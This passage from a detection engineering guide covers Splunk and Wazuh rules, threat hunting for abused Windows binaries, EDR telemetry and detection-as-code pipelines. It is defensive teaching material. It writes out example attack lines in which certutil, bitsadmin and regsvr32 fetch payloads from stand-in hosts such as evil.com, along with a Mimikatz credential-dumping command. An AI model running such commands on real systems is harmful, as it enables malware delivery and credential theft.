  <srcip>10.0.1.50</srcip>  <!-- Known admin workstation -->
  <time>2am - 3am</time>      <!-- Scheduled maintenance window -->
  <weekday>sunday</weekday>
  <description>Whitelisted: Scheduled Sunday maintenance</description>
</rule>

<!-- Increase severity if from external IP -->
<rule id="100202" level="15">
  <if_sid>100200</if_sid>
  <srcip>!192.168.0.0/16,!10.0.0.0/8</srcip>  <!-- NOT internal IPs -->
  <description>CRITICAL: Admin logon from external IP during off-hours</description>
  <group>authentication_success,pci_dss_10.2.5,hipaa_164.312.b</group>
</rule>

Response actions:

  • Alert SOC immediately
  • Verify with admin if activity was authorized
  • Check for concurrent suspicious activities (file access, lateral movement)
  • Consider automatically disabling account pending verification

Multi-Stage Attack Correlation

Kill chain detection:

Stage 1: Phishing email received
  + 
Stage 2: Malicious attachment opened
  +
Stage 3: Beacon callback to external IP
  +
Stage 4: Credential dumping (mimikatz)
  +
Stage 5: Lateral movement (psexec)
  =
HIGH CONFIDENCE BREACH

Correlation rule example (Splunk):

index=email subject="*invoice*" attachment="*.doc"
| join user [
    search index=windows EventCode=1 Image="*\\WINWORD.EXE" 
    | eval user=lower(User)
  ]
| join user [
    search index=network dest_port=443 OR dest_port=8443
    | stats count by src_ip, dest_ip, user
  ]
| join user [
    search index=windows EventCode=10 TargetImage="*\\lsass.exe"
  ]
| table _time, user, src_ip, dest_ip, subject

Detection logic: Correlates multiple events across different data sources to detect a complete phishing attack kill chain, from initial email to credential theft.

Attack kill chain detected:

  1. Stage 1: Phishing email with invoice-themed attachment (.doc file)
  2. Stage 2: User opens Word document (process execution)
  3. Stage 3: Outbound HTTPS connection (payload callback to C2)
  4. Stage 4: LSASS memory access (credential dumping with Mimikatz)

Query breakdown:

Stage 1 - Phishing Email:

index=email subject="*invoice*" attachment="*.doc"
  • Search email logs for “invoice” in subject (common phishing lure)
  • Filter for .doc attachments (macro-enabled documents)
  • Captures username of email recipient

Stage 2 - Document Opened:

join user [search index=windows EventCode=1 Image="*\\WINWORD.EXE"]
  • Join with Sysmon Event ID 1 (Process Creation)
  • Match Word process execution for same user
  • eval user=lower(User) normalizes username for matching

Stage 3 - Network Callback:

join user [search index=network dest_port=443 OR dest_port=8443]
  • Join with network logs (firewall/proxy)
  • Filter for HTTPS traffic (common C2 protocol)
  • Port 8443 = alternative HTTPS port (often used by C2)
  • Stats aggregates to show volume of traffic

Stage 4 - Credential Theft:

join user [search index=windows EventCode=10 TargetImage="*\\lsass.exe"]
  • Join with Sysmon Event ID 10 (Process Access)
  • lsass.exe = Local Security Authority (stores credentials)
  • Accessing LSASS = credential dumping attempt

Output:

_time           user       src_ip          dest_ip         subject
2025-01-15 9:15  jsmith    192.168.1.100   185.220.101.32  Invoice #4721

Why correlation matters:

  • Single event: Might be benign or false positive
  • All events together: High confidence breach (>95%)
  • Time proximity: Events occur within minutes of each other

Limitations:

  • Join performance: Can be slow on large datasets (consider using stats instead)
  • User matching: Assumes consistent username across all logs
  • Time windows: Add earliest=-1h to limit search timeframe

Improved version with time constraints:

index=email subject="*invoice*" attachment="*.doc" earliest=-1h
| eval email_time=_time
| join type=inner user [
    search index=windows EventCode=1 Image="*\\WINWORD.EXE" earliest=-1h
    | eval user=lower(User), word_time=_time
]
| where (word_time - email_time) < 1800  /* Within 30 minutes */
| join type=left user [
    search index=network (dest_port=443 OR dest_port=8443) earliest=-1h
    | stats count, values(dest_ip) as dest_ips by user
]
| join type=left user [
    search index=windows EventCode=10 TargetImage="*\\lsass.exe" earliest=-1h
]
| eval correlation_score=case(
    isnotnull(word_time) AND isnotnull(dest_ips) AND isnotnull(lsass_access), 100,
    isnotnull(word_time) AND isnotnull(dest_ips), 70,
    isnotnull(word_time), 30
)
| where correlation_score > 60

Response when triggered:

  1. Isolate affected workstation from network
  2. Disable user account temporarily
  3. Collect forensic artifacts (memory dump, disk image)
  4. Force password reset for affected user
  5. Scan for lateral movement to other systems

7. Threat Hunting Methodology

Hypothesis-Driven Hunting

The Hunting Loop:

1. Create Hypothesis
   ↓
2. Investigate Data
   ↓
3. Uncover Patterns
   ↓
4. Identify Anomalies
   ↓
5. Create Detection Rule ──→ Production
   ↓
6. Document Findings
   ↓
Loop back to step 1

Example hunting hypothesis:

Hypothesis: Attackers are using LOLBins to bypass application whitelisting

Data sources:
- Sysmon Event ID 1 (Process Creation)
- Windows Event 4688 (Process Creation)

Investigation query:
index=windows EventCode=1
| search Image IN ("certutil.exe", "bitsadmin.exe", "regsvr32.exe", "mshta.exe")
| stats count by Image, CommandLine, ParentImage
| where NOT CommandLine IN (known_good_patterns)

Hunting methodology: This hypothesis-driven hunt looks for Living-Off-The-Land Binaries (LOLBins) - legitimate Windows tools abused by attackers to evade detection.

Target LOLBins explained:

  • certutil.exe: Certificate utility
    • Legitimate use: Manage certificates
    • Malicious use: Download files (certutil -urlcache -f http://evil.com/malware.exe)
  • bitsadmin.exe: Background Intelligent Transfer Service
    • Legitimate use: Manage file downloads
    • Malicious use: Download payloads (bitsadmin /transfer job http://evil.com/payload.exe C:\temp\payload.exe)
  • regsvr32.exe: Register DLL/OCX files
    • Legitimate use: Register COM components
    • Malicious use: Execute remote scripts (regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll)
  • mshta.exe: Microsoft HTML Application Host
    • Legitimate use: Run .hta files
    • Malicious use: Execute remote HTA files with embedded JavaScript/VBScript

Query breakdown:

  1. index=windows EventCode=1: Sysmon process creation events
  2. search Image IN (...): Filter for suspicious LOLBin executables
  3. stats count by Image, CommandLine, ParentImage:
    • Aggregate results
    • Show which LOLBin was used, how it was called, and what spawned it
  4. where NOT CommandLine IN (known_good_patterns):
    • Exclude known legitimate usage patterns
    • Example patterns: software update scripts, system maintenance

Indicators of malicious LOLBin use:

  • Unusual parent process: Explorer.exe spawning certutil (user clicked something)
  • Network URLs in command line: Download indicators
  • Obfuscated parameters: Base64, encoded strings
  • Temp directory paths: Writing to C:\Users*\AppData\Local\Temp\

Example findings:

Image: certutil.exe
CommandLine: certutil.exe -urlcache -f http://185.220.101.32/payload.exe C:\temp\mal.exe
ParentImage: C:\Windows\System32\cmd.exe
→ SUSPICIOUS: Downloading executable from external IP

Image: regsvr32.exe
CommandLine: regsvr32 /s /u /i:http://malicious.com/script.sct scrobj.dll  
ParentImage: C:\Program Files\Microsoft Office\WINWORD.EXE
→ CRITICAL: Office document executing remote scriptlet

Known good patterns to whitelist:

certutil.exe -addstore
certutil.exe -verifystore
bitsadmin.exe /list
regsvr32.exe /s "C:\Program Files\..."

Next steps after findings:

  1. Create Sigma detection rule for confirmed malicious patterns
  2. Add EDR policy to block suspicious LOLBin usage
  3. Implement application whitelisting with argument restrictions
  4. Document findings and update threat intel

MITRE ATT&CK Mapping

Coverage assessment:

# Map detections to ATT&CK framework
detection_coverage = {
    "T1059.001": ["sigma_rule_001", "yara_rule_003"],  # PowerShell
    "T1003.001": ["sigma_rule_015", "suricata_rule_007"],  # LSASS Memory
    "T1021.002": ["sigma_rule_022"],  # SMB/Windows Admin Shares
    "T1071.001": ["suricata_rule_015", "sigma_rule_030"],  # Web Protocols
}

# Calculate coverage percentage
covered_techniques = len(detection_coverage.keys())
total_techniques = 193  # ATT&CK Enterprise Matrix
coverage_percentage = (covered_techniques / total_techniques) * 100

Image suggestion: ATT&CK heatmap visualization showing detection coverage across tactics and techniques.

Hunting Queries Library

Uncommon parent-child process relationships:

index=sysmon EventCode=1
| stats count by ParentImage, Image
| where count < 5
| table ParentImage, Image, count

Hunting logic: Identifies rare parent-child process combinations that may indicate malicious activity. Legitimate processes follow predictable patterns; attackers create unusual relationships.

What this finds:

  • Processes rarely spawned by specific parents (count < 5 in your dataset)
  • Example findings:
    • calc.exepowershell.exe (calculator spawning PowerShell? Suspicious!)
    • notepad.execmd.exe (process injection or exploit)
    • Unknown process chains indicating malware behavior

Tuning: Adjust count threshold based on environment size. Larger environments need higher thresholds.


Scheduled tasks created for persistence:

index=windows EventCode=4698
| rex field=TaskContent "<Command>(?<command>.*?)</Command>"
| table _time, Computer, TaskName, command
| where command LIKE "%powershell%" OR command LIKE "%cmd%"

Hunting logic: Detects scheduled tasks containing command interpreters, a common persistence mechanism used by attackers.

Event details:

  • EventID 4698: Windows Security - Scheduled task created
  • Logs when new tasks are registered in Task Scheduler

What this catches:

  • Malware creating scheduled tasks to survive reboots
  • Command-line execution via task scheduler (fileless persistence)
  • Example malicious tasks:
    TaskName: WindowsUpdate
    Command: powershell.exe -enc <base64_payload>
    → Masquerading as Windows Update but executing malicious PowerShell
    

Regex breakdown:

  • rex extracts XML content from TaskContent field
  • <Command>(?<command>.*?)</Command> captures command between XML tags
  • Named capture group command for easy filtering

Investigate:

  • Verify task legitimacy with system admins
  • Check task trigger (hourly? daily? at system startup?)
  • Review user context (SYSTEM? Administrator?)

Fileless malware indicators:

index=sysmon EventCode=7  # Image loaded
| where ImageLoaded LIKE "%\\Windows\\assembly\\%"
| stats count by Image, ImageLoaded
| where count > 100

Hunting logic: Detects excessive .NET assembly loading, indicating potential fileless malware using .NET reflection to execute code in memory.

Technical background:

  • EventID 7: Sysmon - Image loaded (DLL/assembly loaded into process)
  • %\\Windows\\assembly\\% = Global Assembly Cache (GAC) for .NET
  • Fileless malware loads assemblies dynamically to avoid disk artifacts

What this catches:

  • Malware using PowerShell to load .NET assemblies in memory
  • Living-off-the-land attacks leveraging .NET framework
  • Process injection via .NET assembly loading

Why count > 100?

  • Normal process: Loads handful of assemblies (5-20)
  • Malware: Loads many assemblies repeatedly (100+) for obfuscation/persistence

Example finding:

Image: powershell.exe
ImageLoaded: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\...
Count: 347
→ PowerShell loading automation framework excessively (likely malicious script)

Next steps:

  • Capture PowerShell script block logging (Event ID 4104)
  • Analyze command history
  • Check for encoded commands or obfuscation

8. EDR/XDR Integration & Telemetry

Modern Endpoint Detection

EDR vs Traditional Antivirus:

Traditional AV:
- Signature-based
- File-level scanning
- Reactive

Modern EDR:
- Behavioral analysis
- Process/memory inspection
- Proactive threat hunting
- Incident response capabilities

Key EDR Telemetry

Process execution telemetry:

{
  "event_type": "process_creation",
  "timestamp": "2025-01-15T14:23:10Z",
  "host": "WORKSTATION-042",
  "process": {
    "name": "powershell.exe",
    "pid": 5432,
    "command_line": "powershell.exe -enc JABj...",
    "parent": "outlook.exe",
    "parent_pid": 2891,
    "user": "DOMAIN\\jsmith",
    "integrity_level": "medium"
  },
  "network": {
    "connections": [
      {
        "remote_ip": "185.220.101.32",
        "remote_port": 443,
        "direction": "outbound"
      }
    ]
  },
  "file_operations": [
    {
      "path": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\malware.exe",
      "operation": "create"
    }
  ]
}

Detection rule leveraging EDR data:

Event: Process with encoded PowerShell command
  AND Parent = outlook.exe/winword.exe
  AND Network connection to external IP
  AND File creation in Temp directory
  =
Alert: Possible phishing-based payload execution

XDR Correlation

XDR (Extended Detection and Response) correlates telemetry across endpoints, network, email, and cloud.

Cross-layer detection example:

Timeline:
09:15 - Email gateway: Malicious attachment detected (blocked)
09:17 - Email gateway: Similar email different hash (delivered)
09:23 - EDR: User opened suspicious Word document
09:24 - EDR: Word spawned PowerShell (encoded command)
09:25 - Network: PowerShell connected to known C2 IP
09:26 - EDR: PowerShell injected into explorer.exe
09:28 - Cloud: Unusual O365 login from new IP
09:30 - EDR: Mass file access (potential ransomware)

XDR Correlation Score: 95/100 - HIGH CONFIDENCE BREACH

9. Automation & SOAR Integration

Security Orchestration Use Cases

Automated response workflow:

1. Alert triggered: "Malware detected on endpoint"
   ↓
2. SOAR enrichment:
   - Query threat intelligence (VirusTotal, AbuseIPDB)
   - Check user risk score
   - Validate with EDR
   ↓
3. Automated actions:
   IF confidence > 90%:
     - Isolate endpoint
     - Block C2 IP at firewall
     - Revoke user session tokens
     - Create ticket
     - Notify SOC
   ELSE:
     - Create ticket for investigation
     - Notify tier-1 analyst

Detection-as-Code Pipeline

CI/CD for detection rules:

# .gitlab-ci.yml
stages:
  - validate
  - test
  - convert
  - deploy

validate_sigma:
  stage: validate
  script:
    - sigma-cli check rules/*.yml

test_rules:
  stage: test
  script:
    - python tests/test_detection_rules.py
    - sigma-cli test rules/*.yml --dataset test_data/

convert_sigma:
  stage: convert
  script:
    - sigmac -t splunk rules/*.yml > converted/splunk/
    - sigmac -t elastic rules/*.yml > converted/elastic/
    - sigmac -t sentinel rules/*.yml > converted/sentinel/

deploy_to_siem:
  stage: deploy
  script:
    - curl -X POST $SPLUNK_API/alerts -d @converted/splunk/
    - python deploy_elastic.py converted/elastic/
  only:
    - main

Version control for detections:

detection-rules/
├── sigma/
│   ├── windows/
│   │   ├── process_creation/
│   │   │   ├── mimikatz_usage.yml
│   │   │   └── suspicious_powershell.yml
│   │   └── network/
│   │       └── beacon_callback.yml
│   └── linux/
│       └── privilege_escalation/
├── yara/
│   ├── malware/
│   │   ├── cobalt_strike.yar
│   │   └── emotet.yar
│   └── webshells/
├── suricata/
│   └── emerging-threats.rules
└── tests/
    ├── test_sigma_rules.py
    └── test_data/

10. Detection Engineering Metrics & Continuous Improvement

Key Performance Indicators

Detection health dashboard:

Metric                          Target    Current   Status
────────────────────────────────────────────────────────────
Rule Coverage (ATT&CK)          > 70%     68%       ⚠️
True Positive Rate              > 85%     91%       ✅
False Positive Rate             < 5%      8%        ⚠️
Mean Time to Detect (MTTD)      < 15min   12min     ✅
Mean Time to Respond (MTTR)     < 1hr     45min     ✅
Rules Tested/Validated          100%      100%      ✅
Alert Fatigue Score             < 20      25        ⚠️
Detection Logic Errors          0         2         ❌

Alert Tuning Process

Iterative refinement:

1. Collect False Positive data
   ↓
2. Analyze common patterns
   ↓
3. Update detection logic
   ↓
4. Add exclusions/whitelisting
   ↓
5. Test against historical data
   ↓
6. Deploy updated rule
   ↓
7. Monitor for 2 weeks
   ↓
8. Repeat

Exclusion management:

# sigma rule with managed exclusions
title: Suspicious PowerShell Execution
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-encodedcommand'
  filter_legitimate:
    CommandLine|contains:
      - 'C:\Program Files\Monitoring\scripts\'  # Known good scripts
      - 'HealthCheck.ps1'
    User|endswith: 'SYSTEM'
  condition: selection and not filter_legitimate

Purple Team Exercises

Collaborative detection validation:

Red Team Action:
  Execute: Invoke-Mimikatz -DumpCreds

Expected Blue Team Detection:
  1. Sysmon Event 10: LSASS memory read
  2. Sigma rule triggers: "mimikatz_usage.yml"
  3. Alert generated in SIEM
  4. SOC analyst investigates within 5 minutes

Result:
  ✅ Detection triggered
  ⚠️ Alert buried in noise (20 other alerts)
  ❌ Analyst response time: 25 minutes

Improvement:
  - Increase alert severity
  - Add automated enrichment
  - Tune out low-value alerts

Detection Rule Lifecycle

[New Threat Identified]
        ↓
[Research & Hypothesis]
        ↓
[Rule Development]
        ↓
[Testing (Lab Environment)]
        ↓
[Peer Review]
        ↓
[Staging Deployment]
        ↓
[Production (Monitor Mode)]
        ↓
[Tuning Period (2 weeks)]
        ↓
[Production (Alert Mode)]
        ↓
[Continuous Monitoring]
        ↓
[Quarterly Review]
        ↓
[Update or Retire]

Conclusion

Detection engineering in 2026 requires a disciplined, engineering-focused approach to building and maintaining effective threat detection capabilities. Key takeaways:

Essential practices:

  • Adopt detection-as-code methodologies with version control
  • Implement platform-agnostic detection formats (Sigma)
  • Maintain comprehensive coverage across MITRE ATT&CK framework
  • Integrate multiple detection layers (signatures, behavior, correlation)
  • Continuously measure and improve detection effectiveness

Critical success factors:

  • Quality over quantity: 50 high-fidelity rules > 500 noisy rules
  • Context is everything: Enrich logs before detection
  • Automate ruthlessly: Testing, deployment, response
  • Purple team collaboration: Validate detection with realistic attacks
  • Metrics-driven improvement: Track MTTD, MTTR, false positive rates

Modern detection stack:

  • SIEM/Log aggregation (Splunk, Elastic, Sentinel, Wazuh)
  • Platform-agnostic rules (Sigma)
  • Endpoint detection (EDR/XDR)
  • Network detection (Suricata/Zeek)
  • Malware analysis (YARA)
  • Orchestration & automation (SOAR)

The threat landscape evolves constantly. Detection engineering must be a continuous process of learning, testing, validating, and improving. Build detections that are robust, maintainable, and effective against real-world adversaries.

Remember: The best detection is one that triggers on real threats, provides actionable context, and integrates seamlessly into your response workflow.


Additional Resources

Detection Engineering Platforms & Tools

SIEM Solutions:

Detection-as-Code Tools:

  • Sigma HQ - Generic signature format for SIEM
  • Sigma CLI - Sigma rule converter and validator
  • Uncoder.io - Online Sigma rule converter
  • YARA - Pattern matching for malware detection
  • YARA-CI - Continuous integration for YARA rules

Network Detection:

  • Suricata - High-performance IDS/IPS/NSM engine
  • Zeek - Network analysis framework
  • Snort - Network intrusion detection system
  • Moloch - Large scale packet capture and search

EDR/XDR Platforms:

Threat Hunting Platforms:

Detection Rule Repositories

Sigma Rules:

YARA Rules:

Suricata/Snort Rules:

Learning Resources

Training Platforms:

Books & Guides:

Frameworks & Methodologies:

Blogs & Research:

Community & Forums:

Threat Intelligence Feeds

Open-Source Feeds:

Commercial Platforms:


This guide covers detection engineering fundamentals for building effective, scalable threat detection programs in modern security operations centers.